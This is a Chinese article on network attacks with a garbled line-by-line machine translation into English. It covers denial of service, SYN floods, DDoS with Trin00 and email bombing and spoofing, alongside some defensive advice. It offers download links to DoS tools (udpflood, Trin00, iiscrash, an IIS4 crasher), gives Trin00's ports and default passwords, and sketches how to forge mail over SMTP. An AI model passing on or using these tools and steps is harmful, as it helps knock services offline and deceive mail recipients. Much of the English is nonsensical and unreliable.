Cold Road
█废话 █ nonsense
在这众多的Internet问题中,黑客和网络安全也许是最令人关注的问题。 In many problems in the Internet, hackers, and network security is perhaps the most concern. 。 . 。 . 本文主要不是谈黑客和网络安全的具体技术,而是对网络中的各种攻击的进行形式化描述。 This article is not about hacking and network security specific technology, but a variety of network attacks in formal description. 所描述的对象有以下几个方面: Objects described in the following areas:
拒绝服务攻击(Denial of Service)包括分布式Ddos攻击 Denial of service attacks (Denial of Service) attacks, including distributed Ddos
电子邮件攻击缓冲区溢出*攻击* 网络监听攻击技术 E-mail attack * * attack buffer overflow attacks network monitoring technology
IP欺骗攻击扫描程序与口令攻击计算机病毒 IP spoofing and password scanner computer virus attacks
Trojan Horse和PGP攻击路由和防火墙技术引发的攻击等 Trojan Horse and PGP attack triggered routing and firewall technology attacks
█拒绝服务攻击(Denial of Service) █ denial of service attacks (Denial of Service)
拒绝服务算是新兴攻击中最另人厌恶的攻击方式之一。 New denial of service attack be the most disgusting attack another person one way. 因为目前网络中几乎所有的机器都在使用着TCP/IP协议。 Because the current network in almost all of the machines are using the TCP / IP protocol. 这种攻击主要是用来攻击域名服务器、路由器以及其它网络操作服务,攻击之后造成被攻击者无法正常运行和工作,严重的可以使网络一度瘫痪。 This attack is mainly used to attack the domain name servers, routers and other network operations services, the attacker after the attack was not caused by normal operation and work, the network can be a serious paralyzed. 拒绝服务攻击是指一个用户占据了大量的共享资源,使系统没剩余的资源给其它用户再提供服务的一种攻击方式。 Denial of service attack is a user account for a large number of shared resources, not the rest of the system resources to provide services to other users and then an attack. 拒绝服务攻击的结果可以降低系统资源的可用性,这些资源可以是CPU、CPU时间、磁盘空间、Mode、打印机、甚至是系统管理员的时间,往往是减少或者失去服务。 The result of denial of service attack can reduce the availability of system resources, these resources can be CPU, CPU time, disk space, Mode, printer, or even the system administrator's time is often reduced or lost services.
拒绝服务攻击是针对IP实现的核心进行的,它可以出现在任何一个平台之上。 Denial of service attack is carried out for IP core implementation, which can occur in any one platform. 在UNIX系统面临的一些拒绝服务的攻击方式,完全可能也可以用相同的方式出现在Windows On UNIX systems face a number of denial of service attacks, and there could also be used in the same way in Windows
NT和其它系统中,他们的攻击方式和原理都大同小异。 NT and other systems, their attack methods and principles are similar. 在大多版本的UNIX系统中一般会有管理员限制一个用户可以打开的最大文件数或者可以使用的进程数,其它的一些版本的UNIX也允许针对单个帐户设置可以使用的字盘存储量。 In most versions of UNIX systems in general there will be an administrator to limit a user can open the maximum number of files or processes that can be used, some other versions of UNIX also allows for a single account that can be used to set the word inventory reserves. 但跟其它平台比较UNIX在防止拒绝服务攻击面前还是相对老套的。 But compared with other UNIX platforms in front of or to prevent denial of service attack is relatively old-fashioned. 拒绝服务攻击的方式很多,有将连接局域网的电缆接地、向域名服务器发送大量垃圾请求数据包,使其无法完成来自其他主机的解析请求、制造大量的信息包,占据网络的带宽,减慢网络的传输速率,从而造成不能正常服务等,下面题解的是拒绝服务的详细内容。 Denial of service attacks, many ways, there will connect the LAN cable to ground, a lot of rubbish to the domain name server sends a request packet, it can not complete resolution requests from other hosts, create a large number of packets, occupy the network bandwidth, slowing down the network transfer rate, resulting in not normal services, the following problem solution is the denial of service details.
►拒绝服务的类型 ► type of denial of service
一般的拒绝服务类型大多有两种,第一种就是试图破坏资源,使目标无人可以使用这个资源。 Most generally, there are two types of denial of service, the first is to try to destroy resources, the target that no one can use this resource. 第二就是过载一些系统服务或者消耗一些资源,但这个有时候是攻击者攻击所造成的,也有时候是因为系统错误造成的。 The second is to overload some system service or consumption of some resources, but this is sometimes caused by the attackers, but also sometimes because the system error. 但是通过这样的方式可以造成其它用户不能使用这个服务(你可以填满一个磁盘的分区,让用户和系统程序无法识别和再生成新的文件来实现。) But by this way can cause other users can not use this service (you can fill up a disk partition, allowing users and system does not recognize, and then generate a new file to achieve.)
这两种情况大半是因用户错误或程序错误造成的,并非针对性的攻击。 In both cases more than half is due to user error or program error and not a targeted attack. (例如:一个经典的情况是程序出错,在递归条件中本来是用x!=0,结果写错了成x= (For example: a classic case of a procedural error in the recursive conditions originally used by x! = 0, the result was wrong, as x =
=0。 = 0. ) )
►针对网络中的几种方式的拒绝服务攻击: ► for network denial of service attacks in several ways:
信息数据包流量式:此类方式经常发生在Internet中某一台主机向另一台机器发送大量的大尺寸的数据包,用来减慢这台机器处理数据的速度,从而破坏其正常处理服务的请求情况。 Information packet traffic type: type of approach often occur in a particular host in the Internet to another machine to send a large number of large-size data packets, this machine is used to slow down the speed of data processing, thereby undermining its normal processing services request situation. 这样的数据包往往可能是要求登陆、文件服务或者是简单的PWG。 Such packets may often be required landing, file services, or simply PWG. 不管是什么样子,这样大量的数据包就会加重影响目标机器CPU的负载能力,使其消耗大量的资源来响应这些垃圾请求。 No matter what it was like, this will increase the number of data packets influence the target machine CPU load capacity to consume large amounts of resources to respond to these junk requests. 严重之下可以造成机器没有内存来做任何缓冲存放其它的新的请求,结果就可能会因错误而死机,很多服务器被如此攻击的事实屡见不鲜。 Under the machine can cause serious memory do not store any of the other cushioning new request, the result may be due to an error and crash, a lot of server is the fact that such attacks are common. 在 98年,美国人Victory针对加拿大的一台服务器做出了一次这样的攻击,他先写了个程序,这个程序每秒可以发送近千个echo请求到加的服务器请求 echo服务,来炸这个NIS服务器,结果使加的这个服务器在一段时间内根本无法再响应网络中的任何请求,同时Victory登陆到一台跳板的特权用户,这个跳板向加的NIS服务器询问NIS口令,但是因加的NIS服务器遇到了echo数据包的袭击根本不能做出这个响应,这个时候Victory所用的主机便可以伪装成为一个服务器用来响应跳板的请求,向跳板发出一个用户口令错误的信息,然后Victory再利用这个时间编写了一个程序,专门用来回答那些本来应由加的NIS服务器回答的请求,这样以来,Victory轻而易举的拿到了这个主机的用户口令和权限。 In 1998, the American Victory for a server in Canada made one such attack, he first wrote a program that sends nearly one thousand per second can be added echo request to the server requests the echo service, to bomb the NIS server, resulting in increase of the server in a period of time are simply unable to respond to any requests in the network, Victory while landing a springboard to a privileged user, the springboard to ask additional NIS server NIS password, but because of the increase of NIS The server encountered an echo packet to make this attack can not respond, this time Victory The host server can be disguised as a springboard to respond to the request, a springboard to send a user password to the wrong information, and then re-use this time to Victory write a program, designed to answer those who have NIS servers should be added to answer the request, and it's, Victory's easy to get this host of user passwords and permissions. 对于此类攻击的一般防御是通过一个监视程序,将网络分割成若干小的子网,可以有效的防止,但完全防止是不可能的。 For a general defense of such attacks is through a monitoring program that will partition the network into several smaller subnetworks, can effectively prevent, but it is impossible to prevent.
SYN-Flooding攻击:其实这样的攻击也就是所谓的IP欺骗。 SYN-Flooding attack: This attack is, in fact, the so-called IP spoofing. 就是用一个伪装的地址向目标机器发送一个SYN的请求,多发便可占用目标机器足够的资源,从而造成服务拒绝。 Is to use a fake address to the target machine sends a SYN request, multiple target machines can take up sufficient resources, resulting in denial of service. 它的原理就是向目标机器发出这样的请求之后,就会使用一些资源来为新的连接提供服务,接着回复请求一个SYN-ACK的答复。 Its principle is to the target machine to issue such a request, it will use some resources to provide services for the new connection, then requests a SYN-ACK reply to the reply. 由于这个回复是返回到一个伪装的地址上了,所以它没有任何响应,目标机器便会无休止的继续发送这个回复直到“对方”反应为止,但事实上“对方”根本上不会做出任何反应的。 Because of this response is to return to a fake address, so it does not have any response, the target machine will continue to send the replies endless until the "other" response so far, but in fact "the other" will not make any fundamental the reaction. 在一些系统中都有缺省的回复次数和超时时间,只有回复一定的次数或者超时的时候占用资源才会释放。 In some systems have a default frequency and timeout responses, only reply to a certain number of times or overtime will be released when the resource-intensive. NT3.5x 和4.0中缺省设置为可重复发送SYN-ACK答复5次,每次重发后等待时间翻一翻,第一次等待时间为3秒钟,到5次重发之时机器将等待48秒才能得到响应,如果仍是无法收到响应的时候系统将仍要等待96秒才取消分配给连接的资源,在这些资源得到释放之前已经是189秒之后了。 NT3.5x and 4.0 in the default setting is to send a SYN-ACK reply, repeated 5 times, each time re-issued after the waiting time to double, the first waiting time of 3 seconds, re-issued to five times when the machine will wait 48 seconds to get the response, if you still can not receive a response when the system will have to wait 96 seconds before to cancel the resources allocated to the connection, before the release of these resources is 189 seconds later. 其实这样的攻击不会得到任何系统的访问权限的,但对于大多数的TCP/IP协议栈,处于SYN-RECEIVED状态的连接数量非常有限,当达到端口极限的时候目标机器通常作出个响应,重新设置所有的额外连接请求,直到分配的资源释放出来为止。 In fact, this attack will not get access to any system, but for most of the TCP / IP protocol stack, SYN-RECEIVED state in a very limited number of connections, when the time limit to reach the port to a target machine usually respond, re- Set all of the additional connection requests until the release of resources allocated so far. 一般情况下你可以使用网络netstat命令来查看自己的连接情况来确认是否正处于或者受到SYN-Flood攻击。 Under normal circumstances you can use the netstat command to view network connections to identify their own whether it is in or by the SYN-Flood attacks. 你可用netstat You can use netstat
–n –a -N-a
tcp命令就可。 tcp command can be. 如果大量的连接线路处于SYN-RECEIVED状态,那么你正在遭受着攻击。 If a large number of connections in the SYN-RECEIVED state line, then you are under attack. 。 . 。 . 。 . 。 . 。 . 其实这样的感觉你可以在oicq中发送一个因网络不通的信息就可以体会得到的^*^。 In fact, such a feeling you can send a oicq unreasonable because the information network can be realized in ^ * ^.
“Paste”式攻击:在很多UNIX系统的TCP/IP协议实现程序中,往往存在着被滥用的可能性,那么这样就会被别人利用从而使用TCP的半连接来消耗系统资源造成服务拒绝。 "Paste" attacks: In many UNIX system's TCP / IP protocol process, often there is potential for abuse, then this will be used by others to use TCP half connection to consume system resources resulting in denial of service. TCP连接是通过三次握手来建立一个连接和设置参数的,我想这个对你来说不会陌生的,因为这属于上网的常识性问题。 TCP connection is through the three-way handshake to establish a connection and set the parameters, I think this will not be unfamiliar to you, because this is the Internet's common-sense issue. 如果向一个目标机器发出很多个连接的请求,这样就可以建立初步的连接,但并非是个完全的连接,因为它没有完成所有的连接步骤,这就是所谓的半连接,当目标机器收到这样的半连接之后便会将其保留,并占有限的资源。 If a target machine to send a number of connection requests, so that you can establish an initial connection, but not the connection is complete, because it does not complete all the steps of connecting, which is called the half-connection, when the target machine receive such After half-connection will be retained and accounted for limited resources. 但大多时候这样的连接所使用的是伪造的源地址,表明了连接来自一台不存在的机器或者一台根本无法访问的机器,这样就不可能去跟踪这个连接,唯一能做的只能是等待这个连接因为超时而释放。 But most of the time used by this connection was forged source address that the connection from a machine that does not exist or could not access a machine, so it is impossible to trace this connection only can do only can wait for the release of this connection because of a timeout.
服务过载式:当大量的服务请求发送到一台目标机器中的守护进程,这样就使目标机器忙于处理这样的请求,造成无法处理其它的常规任务,同时一些其它的连接也将被丢弃,因为已经没有余力和空间来存放这些请求,这时候就会发生服务过载。 Service overload type: when a large number of service requests sent to a target machine in the daemon, so that the target machine is busy processing such requests, resulting in can not handle other routine tasks, while some other connection will be dropped, because has no spare capacity and space to store these requests, which occurs when the service overload. 如果攻击所针对的是TCP协议的服务,那么这些请求还将会被重发,结果更加会造成网络的负担。 If the attack against the TCP protocol services, then these requests will also be re-issued, the results will cause more burden on the network. 类似如此的攻击多半是源于想隐藏自己,防止所被攻击的机器将自己记录,这样的攻击还可以阻止系统提供的其它一些特定的服务。 This attack is similar to most want to hide from themselves, to prevent the machine being attacked by their own records, such attacks can also prevent the system provides a number of other specific services. 此外当被攻击的服务有inetd进程的话,使用nowait选项启动时,缺省的inetd有个“strangle”的功能在里面。 In addition, when the service has to be attacked, then the inetd process, use the nowait option is enabled, the default inetd has a "strangle" the function in it. 在很短时间内,针对它所监视的那些服务带来了过多的请求时它将开始拒绝那些请求了,并且用Syslog记录下那些错误的服务请求。 In a very short period of time, for those services it monitors bring too much when it began to reject the request the request, and the record those errors with the Syslog service request. 在这样的情况之下服务进程本身不会运行失败的,同时也留下了记录,可以追踪到问题的根本所在。 In such circumstances the service process itself does not fail, and also left a record, can be traced to the problem lies. 。 . 。 .
►过载攻击:过载攻击可有进程过载攻击、系统过载攻击、磁盘过载攻击等。 ► overload attacks: a process overload attacks can overload attacks, system overload attack, disk overload attacks.
进程过载攻击是最简单的拒绝服务攻击。 Process is the simplest overload attack denial of service attacks. 它攻击的效果就是拒绝与你同时间内连接目标机器的其它用户,这样往往表现在发生共享的机器上,如果没人跟你争那么这样将毫无必要。 The effect is that it attacks the same time refuse to connect with your target machine with other users, so often manifested in the event of a shared machine, if no one will tell you that there is no need to fight it. 这样的攻击对于现在的UNIX系统不会有太大的效果的,现在的Unix限制任何UID(除了0)使用的进程数目。 Such attacks for UNIX systems now will not have much effect, limit any current Unix UID (except 0) the number of processes used. 这个限制叫做“MAXUPROC”,当系统构筑时,在内核进行设置,一些系统允许在启动的时候设置这个值。 This limit is called the "MAXUPROC", when the system is built, in the core set, some systems allow the start time to set this value. 比如Solaris允许在/etc/system文件中设置这个值。 Such as Solaris, allows the / etc / system file to set this value. Set Set
MAXUPROC=100 MAXUPROC = 100
在Unix系统中,可以通过发送sigterm信号来消除一些垃圾进程。 On Unix systems, you can send the signal to remove some junk sigterm process. 命令如: Command such as:
#kill-TERM-1 # Kill-TERM-1
# #
或者是(如果你当前的Unix没有上述的话) Or (if your current Unix is not above it)
#kill-TERM1 # Kill-TERM1
# #
(当然了,你必须有root的权限)Unix会自动kill掉一些的垃圾进程,然后进入单机模式,再者可以执行sync重新启动系统即可。 (Of course, you must have root privileges) Unix will automatically kill off some of the waste process, and then into stand-alone mode, addition to the sync can restart the system. 但如果没有root权限在手的话,你可以使用exec来运行su,因为这个不需要生成新的进程, But if there is no root access in hand, you can use exec to run su, because this process does not require a new generation,
% exec/bin/su % Exec / bin / su
password: password:
# #
这里值得注意的是你不要打错了口令或者直接运行exec It is worth noting that the password is wrong or you do not directly run the exec
ps,因为程序会执行,完毕后将自动退出系统^*^,不过我建议如果你是在本地的话还是在机箱上按RESET的好,虽然有点破坏磁盘的文件但是却很管用。 ps, because the program execution, completion will automatically exit the system ^ * ^, but I suggest that if you are local or in the case, then press RESET on the good, although a little damage to the disk file, but very useful. 哈哈。 Haha.
系统过载攻击:流行的一种基于进程的攻击,原因是一个用户产生了许多进程,消耗了大量的CPU的时间,这样就减少了其它用户可用的CPU处理时间。 System overload attacks: a popular process-based attacks, because many processes a user-generated, consumed a lot of CPU time, so other users can reduce the CPU processing time. 比如说当你使用了近十多个find命令,并使用了gerp在一些目录里查找文件,这些都可以使系统变的很慢。 For example, when you use the past more than the find command, and use gerp locate the file in some directory, which can make the system become very slow. 建议多用户使用nice从而降低后台运行进程的优先级,或使用at和batch命令将一些长的任务安排在系统较清闲的时候使用。 Recommended to use multi-user processes running in the background nice to reduce the priority of, or use at and batch commands some of the long task is scheduled to use the system more leisure time. 不过如果是有意式攻击的话没人理会这个的哦。 But if it is interested in this type of attack, then deaf ears Oh. 你还得通过root登陆,再将自己的优先级设置高点,通过ps查看然后针对垃圾进程kill掉就OK了。 You have to login as root, then set their own high priority by ps check out and then kill the process for the garbage on OK.
其实在网络中,系统对拒绝服务攻击的抵抗能力很差的,今年的雅虎、亚马逊、CNN、ebay等国际著名站点都是被拒绝服务攻击所瘫痪。 In fact, network, system denial of service attack on the poor resistance to this year's Yahoo, Amazon, CNN, ebay and other international well-known sites are being paralyzed by denial of service attacks. 而在这些攻击中所用的工具从去年就开始流行于网络中了,这就是udpflood。 In these attacks, the tools used in the popular since last year the network, and this is udpflood.
你可以从http://semxa.kstar.com/hacking/udpflood.exe获得它,这个是经过我汉化之后的。 You can get it from http://semxa.kstar.com/hacking/udpflood.exe, this is the result after I finished. 但是它的效果并非传说中的那么厉害。 But its effect is not so powerful legend. 单一的使用udpflood根本不会造成什么大的结果的。 Single use udpflood did not cause any major results. 除非你有相对的技术,有针对性的去进行攻击。 Unless you have a relative technique, targeted to carry out attacks.
附:两种破坏性的拒绝服务的攻击以及措施 Appendix: Two destructive denial of service attacks as well as measures
**重新格式化磁盘分区或运行newfs/mkfs命令 ** Reformat the disk partition or run newfs / mkfs command
防备:防止任何用户在单用户状态下访问机器,保护系统管理员的帐号,对那些只读的磁盘进行保护。 Preparedness: prevent any user in single user mode access to the machine to protect the system administrator account, for those read-only disk protection.
**删除关键文件,比如像/dev/下的文件或者是ect/passwd文件 ** Delete critical files, such as / dev / files in or ect / passwd file
防备:使用正确的模式字(像755或711)保护系统文件,保护好root权限,将NFS的文件设置为root所有,并且以只读的方式调出。 Preparedness: Use the correct mode word (like 755 or 711) to protect system files, protect the root, the NFS file is set to root, and read-only way to tune out.
█分布式拒绝服务(DDos)攻击 █ Distributed Denial of Service (DDos) attack
1999年7月份左右,微软公司的视窗操作系统的一个bug被人发现和利用,并且进行了多次攻击,这种新的攻击方式被称为“分布式拒绝服务攻击”即为“DDos(Distributed Around July 1999, Microsoft's Windows operating system, a bug was found and use, and conducted a number of attacks, this new attack is called "distributed denial of service attack" is "DDos (Distributed
Denial Of Service Denial Of Service
Attacks)攻击”。这也是一种特殊形式的拒绝服务攻击。它是利用多台已经被攻击者所控制的机器对某一台单机发起攻击,在这样的带宽相比之下被攻击的主机很容易失去反应能力的。现在这种方式被认为是最有效的攻击形式,并且很难于防备。但是利用DDos攻击是用一定难度的,没有高超的技术是很难实现的,因为不但要求攻击者熟悉入侵的技术而且还要有足够的时间和脑袋。而现在却因有黑客编写出了傻瓜式的工具来帮助所以也就使DDos攻击相对变的简单了。比较杰出的此类工具目前网上可找到的有Trin00、TFN等。这些源代码包的安装使用过程比较复杂,因为你首先得找到目标机器的漏洞,然后通过一些的远程溢出漏洞攻击程序,获取系统的控制权,再在这些机器上安装并运行的DDos分布端的攻击守护进程。 Attacks) attack. "This is a special form of denial of service attacks is to use more than one has been attacked by those who control the machines on a single machine to attack in such a bandwidth compared to the host is attacked easy to lose the ability to respond to now this approach is considered the most effective form of attack, and it is difficult to prepare, but the use of certain DDos attack is difficult, there is no superior technology is difficult to achieve, because not only requires the attacker to know the invasion of technology but also have enough time and head while now because of a hacker write a fool-style tools to help make the DDos attack so it becomes relatively simple. more prominent of these tools can be found online now There Trin00, TFN etc. These source code package of the installation process is relatively complex, because you first have to find loopholes in the target machine, then through some remote overflow exploit program, to obtain control over, and then installed on these machines and run the distribution side of DDos attacks daemon.
其实Trin00有点像木马程序,它由三部分构成,三部分分别是客户端、主控端(master)、Broadcast(即分布端攻击守护进程)。 In fact Trin00 bit like Trojans, which consists of three parts, three parts are the client host (master), Broadcast (the distribution side of the attack daemon). 客户端是telnet的程序,作用是向目标主制端(master)攻击发送命令。 Is a telnet client program, the main role is to target the system side (master) sends commands attack. 主控端(master)主要是监听两个连接的端口27655和31355。 Host (master) is monitoring two major ports 27655 and 31355 connections. 其中27655就是用来接收由客户端发来的命令,这个执行要求密码,如果缺省密码可能是“betaalmostdone”,主控端(master)启动的时候会显示一个提示符号“?”,等待密码输入之后(密码为g0rave)31355这个端口便开始等候分布端的UDP报文。 Of which 27 655 is to receive the commands sent by the client, the implementation requires a password, if the default password might be "betaalmostdone", host (master) when activated displays a prompt "?" And wait for the password input After (the password is g0rave) 31355 The port began to wait for the distribution side of the UDP packet. 至于Broadcast(即分布端攻击守护进程),在这个时候当然毫无疑问的就是执行攻击的了。 The Broadcast (ie the distribution side attack daemon), there is no doubt at this time of course, is the implementation of the attack. 这个端是安装在一台已经被你所控制的机器上的,编译分布端之前首先得先植入主控端(master)的真实有效的IP地址,它跟主控端(master)是利用 UDP报文通信的,发送至主控端(master)的31355端口,其中包含“*HELLO*”的字节数据,主控端把目标机器的信息通过UDP27444 端口发送给Broadcast(即分布端攻击守护进程),这个时候Broadcast(即分布端攻击守护进程)便回开始发起攻击了。 This side is already installed in a machine you control, compiled before the end of the first distribution was first implanted host (master) of the IP address of a real and effective, it is with the host (master) is to use UDP packet communication, sent to the host (master) of the 31355 port, which contains "* HELLO *" bytes of data, host to the target machine to send information through UDP27444 port Broadcast (the distribution side of the attack daemon ), this time Broadcast (the distribution side of the attack daemon) will begin to attack the back. 这次攻击的流向显而易见为: The flow of the attack is clear:
发起攻击的机器-à主控端(master)-à Broadcast—>目标机器 Attack machine-à host (master)-à Broadcast-> target machine
从Broadcast(即分布端攻击守护进程)向目标机器发出的都是UDP报文,每个包含4个空字节,这些报文都是从一个端口发出的,但是针对的目标机器的端口则是不同的。 From the Broadcast (ie the distribution side attack daemon) are sent to the target machine UDP packets, each containing four null bytes, these messages are sent from a port, but the port for the target machine is different. 目标机器对每个报文都要回复一个ICMP For each target machine must reply an ICMP packet
Port Unreachable的信息,大量不同主机发来的这些UDP报文会把目标机器变的慢慢的速度减低。 Port Unreachable message sent to a number of different hosts, these UDP packets become the target machine will speed slowly reduced. 一直到带宽成为0。 The bandwidth has to be 0.
关于这个Trin00工具你可以从http://semxa.kstar.com/hacking/Trin00.exe获得。 About this Trin00 tool you can get from http://semxa.kstar.com/hacking/Trin00.exe. 但是需要你再进行编译和移植哦,否则将不可使用。 But you need to re-compile and transplantation Oh, or they will not be used.
DDos攻击的主要效果是消耗目标机器的带宽,所以很难防御的。 The main effect of DDos attack the target machine is consuming the bandwidth, it is difficult to defense. 但有很多方法可以检测的到这种攻击。 But there are many ways to detect such attacks. 可以通过IDS来防御和检测,分析得到的UDP报文,寻找那些针对本地不同端口的报文而又是从一个源地址的同一个端口发来的UDP报文。 By IDS to prevention and detection, the analysis of the UDP packet, look for a different port for local packets from a source address but the same port UDP packets sent. 或者可以拿出十个以上的UDP报文,分析是否来自同一个地址,相同的地址,相同的端口,不同的只是端口报文,那么这个就必须得注意了。 Or you can come up with more than ten UDP packets, analysis is from the same address, same address, same port, but different port packet, then this would have to pay attention. 还有一种就是寻找那些相同的源地址和相同的目标地址的ICMP Another is to find those same source address and destination address the same as the ICMP
Port Unreachable的信息。 Port Unreachable message. 这些方法都可以使管理员识别到攻击来自何方。 These methods allow administrators to identify the attacks come from.
你还可以从http://semxa.kstar.com/hacking/iiscrash.zip获得IIScrash程序,这个程序可以使IIS服务器拒绝服务,效果就是可以使远程机器禁止多个网络服务。 You can also get IIScrash from http://semxa.kstar.com/hacking/iiscrash.zip program, this program can make IIS server denial of service, the effect is to prohibit the remote machine can make multiple network services. 虽然它还不是危害网络安全的主要因素,但是对于防御较薄弱的IIS服务器还是有点伤害的。 Although it is not a major factor in network security risk, but relatively weak for the defense of the IIS server is still a little hurt. 所以建议小心使用。 It is proposed be used with care. 你还可以从http://semxa.kstar.com/hacking/iis4dos01.exe获得由国人小榕编写的针对IIS4D.oS You can also get from http://semxa.kstar.com/hacking/iis4dos01.exe written by the people for IIS4D.oS small Banyan
0.1-IIS4的攻击工具,效果会使IIS4服务器当机。 0.1-IIS4 attack tools, the effect will IIS4 server to crash. 但目前来看,效果并非很明显。 But, the effect is not obvious.
█电子邮件的攻击 █ e-mail attack
电子邮件炸弹是一种让人厌烦的攻击。 E-mail bomb is an annoying attack. 传统的邮件炸弹大多只是简单的向邮箱内扔去大量的垃圾邮件,从而充满邮箱,大量的占用了系统的可用空间和资源。 Most traditional mail bombs simply threw it to the mailbox a lot of spam, so full of mail, the system takes up a lot of available space and resources. 使机器暂时无法正常工作。 The machine is temporarily unable to work. 如果是拨号上网的用户利用pop来接收的话那么还会增加连网时间,造成费用和时间的浪费。 If you use a dial-up Internet users to receive, then pop it will increase the networking time, resulting in cost and waste of time. 事实上现在这样的工具在网络中随时都可以找到,不单是如此,更另人担心的是这些工具往往会让一些刚刚学会上网的人利用,因为它很简单。 In fact this tool is now in the network can always be found, not only so, but another worry is that some of these tools are often just learn to let people use the Internet, because it is very simple. 同时这些工具有着很好的隐藏性,能保护到发起攻击者的地址。 These tools also have a very good hidden, to protect the address of the attacker to launch. 过多的邮件垃圾往往会加剧网络的负载力和消耗大量的空间资源来储存它们,过多的垃圾信件还将导致系统的log文件变得很大,甚至有可能溢出文件系统,这样会给Unix、Windows等系统带来危险。 Junk mail too often exacerbate network load power and consume a large amount of space resources to save them, too much junk mail will result in system log files become very large, there may even overflow file system, this will give the Unix , Windows and other systems at risk. 除了系统有崩溃的可能之外,大量的垃圾信件还会占用大量的CPU时间和网络带宽,造成正常用户的访问速度成了问题。 In addition to the possibility of system crashes, the large amount of junk mail will take a lot of CPU time and network bandwidth, causing the normal user's access speed become a problem. 例如:同时间内有近百人同时向某国的大型军事站点发去大量的垃圾信件的话,那么这样很有可能会使这个站的邮件服务器崩溃,甚至造成整个网络中断。 For example: at the same time there are hundreds of people at the site of a country's large military sent a lot of junk mail, then this is likely to make this site e-mail server crashes, or even cause the entire network interruption.
其实电子邮件因为它的可实现性比较广泛,所以也使网络面临着很大的安全危害,恶意的针对25(缺省的SMTP端口)进行SYN-Flooding攻击等等都会是很可怕的事情。 In fact, e-mail because it can be realized more widely, so it makes the network faces significant safety hazards, malicious for 25 (the default SMTP port) for SYN-Flooding attack, and so would be a terrible thing. 电子邮件攻击有很多种,主要表现为: There are many e-mail attacks, mainly as follows:
窃取、篡改数据:通过监听数据包或者截取正在传输的信息,可以使攻击者读取或者修改数据。 Theft, tampering with data: by listening or intercept packets of information being transmitted, can allow an attacker to read or modify data. 通过网络监听程序,在Winodws系统中可以使用NetXRay来实现。 Through the network monitoring program, the system can be used in Winodws NetXRay to achieve. UNIX、Linux系统可以使用Tcpdump、Nfswatch(SGI UNIX, Linux systems can use Tcpdump, Nfswatch (SGI
Irix、HP/US、SunOS)来实现。 Irix, HP / US, SunOS) to achieve. 而著名的Sniffer则是有硬件也有软件,这就更为专业的了。 The Sniffer is a well-known hardware have software, which is more of a professional.
伪造邮件:通过伪造的电子邮件地址可以用诈骗的方法进行攻击。 Forged e-mail: e-mail addresses can be forged through fraudulent methods used to attack.
拒绝服务:让系统或者网络充斥了大量的垃圾邮件,从而没有余力去处理其它的事情,造成系统邮件服务器或者网络的瘫痪 Denial of service: the system or network filled with a lot of spam, so there is no spare capacity to deal with other things, cause the system to the mail server or network paralysis
病毒:在现在生活中,很多病毒的广泛传播是通过电子邮件传播的。 Virus: in the present life, many of the wide dissemination of the virus is spread via e-mail. I love you就是新千年里最为鲜明的例子。 I love you is the new millennium, the most vivid example.
►电子邮件的发送过程 ► e-mail sending process
对于保护电子邮件的安全来说,了解一下电子邮件的发送过程是很有必要的。 Is to protect the security of e-mail to learn about the process of sending e-mail is necessary. 它的过程是这样的,当有用户将邮件写好之后首先连接到邮件服务器上,当邮件服务器有响应时便会启动邮件工具,调用路由(这里指的是邮件的路由)程序 Sendmail进行邮件路由,根据邮件所附的接收地址中指定的接收主机,比如:semxa@yeah.net里的yeah.net,与位于主机 yeah.net电子邮件后台守护程序建立25端口的TCP连接,建立后双方按照SMTP协议进行交互第进,从而完成邮件的投递工作,接收方电子邮件接收邮件后,再根据接收用户名称,放置在系统的邮件目录里,如/usr/电子邮件目录的semxa文件中。 It is this process, when a user after the first message written to the mail server, when the mail server will be activated when a response e-mail tool, call routing (in this case is the message routing) program Sendmail for mail routing , according to the e-mail address attached to the receiver specified in the receiving host, such as: semxa@yeah.net in the yeah.net, and in the host yeah.net e-mail daemon to establish a TCP connection to port 25, after the establishment of both parties in accordance with SMTP first into an agreement to interact, thus completing the mail delivery work, the recipient receives an e-mail message, and then according to the received user name, e-mail placed in the system directory, like / usr / mail directory semxa file. 接收用户同样使用邮件工具获取和阅读这些已投递的邮件。 Receive e-mail users use the same tools to access and read these messages have been posted. 如果投递失败的话,这些邮件将重新返回到发送方。 If the delivery fails, these messages will be re-return to sender. 实际上电子邮件的发送过程要比这里所说的更为复杂些,在过程里将会涉及很多的配置文件。 In fact e-mail sending process is more complex than those mentioned here, will be involved in the process where a lot of configuration files. 在现在的SMTP协议是一个基于文本的协议,理解和实现都相对比较简单些,你可以使用telnet直接登陆到邮件服务器的25端口(由LANA授权分配给SMTP协议)进行交互。 The SMTP protocol is now a text-based protocol, understand and are relatively simple to achieve something, you can use telnet to log in directly to the mail server port 25 (assigned by the authorized SMTP protocol LANA) interact.
►电子邮件欺骗: ► E-mail spoofing:
就目前来说,SMTP协议极其缺乏验证能力,所以假冒某一个邮箱进行电子邮件欺骗并非一件难的事情,因为邮件服务器不会对发信者的身份做任何检查的。 For now, SMTP authentication protocol is sorely lacking, and they fake one mailbox for e-mail spoofing is not a difficult thing, because the mail server, the identity of the sender will not do any checks. 如果邮件服务器允许和它的25SMTP端口连接的话,那么任何一个人都可以连接到这个端口发一些假冒或乌有用户的邮件,这样邮件就会很难找到跟发信者有关的真实信息,唯一能检查到的就是查看系统的log文件。 If the mail server and its 25SMTP port allows connection, then anyone can connect to this port number of counterfeit or black hair with the user's mail, so e-mail with the sender will be difficult to find information about the real, the only check to view the system log file is. 找到这个信件是从哪里发出的。 Where to find this letter is sent. 但事实上很难找到伪造地址的人的。 But the fact is difficult to find people who forged address. 一个SMTP会话的文本是这样的:在使用helo表明本方标识以后,邮件发送方应该通过电子邮件from和rcpt Text in an SMTP session is this: that the use of helo after the party logo, it should via e-mail messages from the sender and rcpt
to命令指出这个邮件的发送方和接收方,然后再调用data命令输入邮件正文的数据,并且以“.”为首的行表示数据的结束,最后通过quit命令退出SMTP会话并且结束与25端口的连接。 to command that the message sender and receiver, and then call the message body of data command input data, and to "." headed by the end of the line representing the data, and finally through the quit command to exit the SMTP session and end with the 25 port to connect . 这样你可以自己测试一下伪造的秘密所在了。 So you can test the secret of the fake. 当然了,这应该是为安全而测的。 Of course, this should be as safe and measurable.
►保护电子信箱 ► E-mail protection
保护电子信箱邮件的信息安全最有效的办法就是使用加密的签名技术,像PGP来验证邮件,通过验证可以保护到信息是从正确的地方发来的,而且在传送过程中不被修改。 E-mail the message to protect information security and the most effective way is to use cryptographic signature technology to verify the message as PGP, can protect the information through the verification is sent from the right place, and in the process of transmission has not been modified. 但是这就不是个人用户所能达到的了。 But this is not the individual users can achieve. 因为PGP比较复杂。 Because PGP is more complicated.
